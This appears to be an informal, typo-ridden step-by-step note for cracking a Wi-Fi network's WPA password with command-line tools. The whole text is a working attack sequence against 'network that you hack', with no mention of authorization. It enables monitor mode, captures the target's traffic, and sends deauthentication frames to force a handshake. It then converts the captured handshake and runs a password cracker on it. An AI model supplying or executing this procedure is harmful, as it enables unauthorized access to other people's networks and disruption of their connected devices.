2)airmon-ng start wlan0
3)airmon-ng check kill
5)airodump-ng wlan0mon
6)ctrl +c (after show you network that you hack )
7)open new terminal
8)cd Desktop
9)mkdir capture
10)airodump-ng -c (channal number) --bssid (channal) -w /root/Desktop/capture/ wlan0mon
11) open new terminal
12)cd Desktop
13)aireplay-ng -0 2 -a bssid wlan0mon After getting Handshake close all the terminal.
1) Open New terminal
2)cd Desktop
3)aircrack-ng handshake name.cap -J new name of file
4)cd johnTheRipper
5 cd run
6)hccap2john /root/Desktop/new name of file.hccap > /root/Desktop/new namr .txt
7) open new terminal .......Desktop Directory..
9)john fle name.txt